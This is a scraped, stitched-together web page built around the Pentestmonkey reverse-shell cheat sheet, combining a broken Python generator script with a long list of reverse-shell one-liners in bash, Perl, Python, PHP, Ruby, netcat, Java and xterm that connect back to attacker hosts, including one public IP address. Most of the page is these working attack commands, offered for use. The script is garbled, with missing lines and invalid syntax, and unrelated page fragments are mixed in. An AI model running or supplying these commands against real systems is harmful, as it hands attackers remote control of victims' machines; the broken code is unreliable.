Pentestmonkey Cheat Sheet

Posted on  by 



Jan 27th, 2019
Never

Pentestmonkey Oracle Cheat Sheet

Set up a SOCKS proxy on 127.0.0.1:1080 that lets you pivot through the remote host. Pentestmonkey Initial commit 8aa37eb May 29, 2015. 2 commits Files Permalink. Failed to load latest commit information.

Pentestmonkey Cheat Sheet

Pentestmonkey Cheat Sheet 2020

Cheat
Not a member of Pastebin yet?Sign Up, it unlocks many cool features!
  1. # http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  2. import sys
  3. banner=''--<Pentest-Monkey-Reverse-shell>--
  4. [1] Bash
  5. [3] Python
  6. [5] Netcat
  7. ''
  8. def isIp(ip):
  9. ip_pattern = re.compile('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$')
  10. return (port.isdigit and int(port) > 1 and int(port) < 65535)
  11. def quit(msg):
  12. exit(0)
  13. if(len(sys.argv) != 4):
  14. exit(0)
  15. shell = sys.argv[1]
  16. port = sys.argv[3]
  17. if(shell.isdigit and int(shell)>=1 and int(shell) <= 6) False:
  18. quit('[!] Invalid IP address given.')
  19. quit('[!] Invalid port given.')
  20. shell = int(shell)
  21. if(shell 1):
  22. print 'bash -i >& /dev/tcp/%s/%s 0>&1' % (host, port)
  23. print 'use Socket;$i='%s';$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};' % (host, port)
  24. print 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('%s',%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);' % (host, port)
  25. print '$sock=fsockopen('%s',%s);exec('/bin/sh -i <&3 >&3 2>&3');' % (host, port)
  26. print 'nc -e /bin/sh %s %s' % (host, port)
  27. print 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc %s %s >/tmp/f' % (host, port)
RAW Paste Data
reverse-netcat.txt

Pentestmonkey.net Cheat Sheet

Pentestmonkey
On attack host in 'local' active terminal using port 10000 for example:
nc -l -t -v 8080
i.e. attacker$ nc -l -v [ATTACK_HOST_IP] 8080
Then On 'remote' victim computer - run this command
Get this to execute on the victim host ( assuming victim does not have netcat )
bash -i >& /dev/tcp/[ATTACK_HOST_IP]/10000 0>&1
for example:
bash -i >& /dev/tcp/54.161.245.60/10000 0>&1
UNTESTED variation in comments on https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
simple nc variant with two connections: ( untested ? )
nc localhost 1233 | /bin/sh | nc 127.0.0.1 1234
Netcat
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 2>&1
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 2>&1
/bin/bash -i >& /dev/tcp/attackerip/4444 0>&1
Or for M$ windows:
nc.exe 192.168.100.113 10000 –e cmd.exe
As soon as that command is executed, you will have a remote shell on the 'local' terminal window.
Note: This will be CLEAR TEXT!!
adopted and updated from
https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/
Other resources:
https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.gnucitizen.org/blog/reverse-shell-with-bash/
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
Bash adapted by pentestmonkey from https://www.gnucitizen.org/blog/reverse-shell-with-bash/
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
small no-feature version of http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
perl -e 'use Socket;$i='10.0.0.1';$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.0.0.1',1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);'
PHP
try fd 4,5,6 if fd 3 is the TCP connection is NOT using file descriptor 3.
php -r '$sock=fsockopen('10.0.0.1',1234);exec('/bin/sh -i <&3 >&3 2>&3');'
Ruby
ruby -rsocket -e'f=TCPSocket.open('10.0.0.1',1234).to_i;exec sprintf('/bin/sh -i <&%d >&%d 2>&%d',f,f,f)'
NC Netcat ( i.e. AWS Linux 2 )
nc -e /bin/sh 10.0.0.1 1234
or try this next one from Jeff Price
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
i.e.
mkfifo mypipe ; cat mypipe|/bin/bash|nc -l -p 6000 >mypipe
Java untested
r = Runtime.getRuntime()
p = r.exec(['/bin/bash','-c','exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done'] as String[])
p.waitFor()
xterm
xterm -bg black -fg white -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001).
One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorise the target to connect to you (command also run on your host):
xhost +targetip

Pentestmonkey Cheat Sheets

Sign up for freeto join this conversation on GitHub. Already have an account? Sign in to comment




Coments are closed
Post Box Service Near Me Web Scraping Framework Python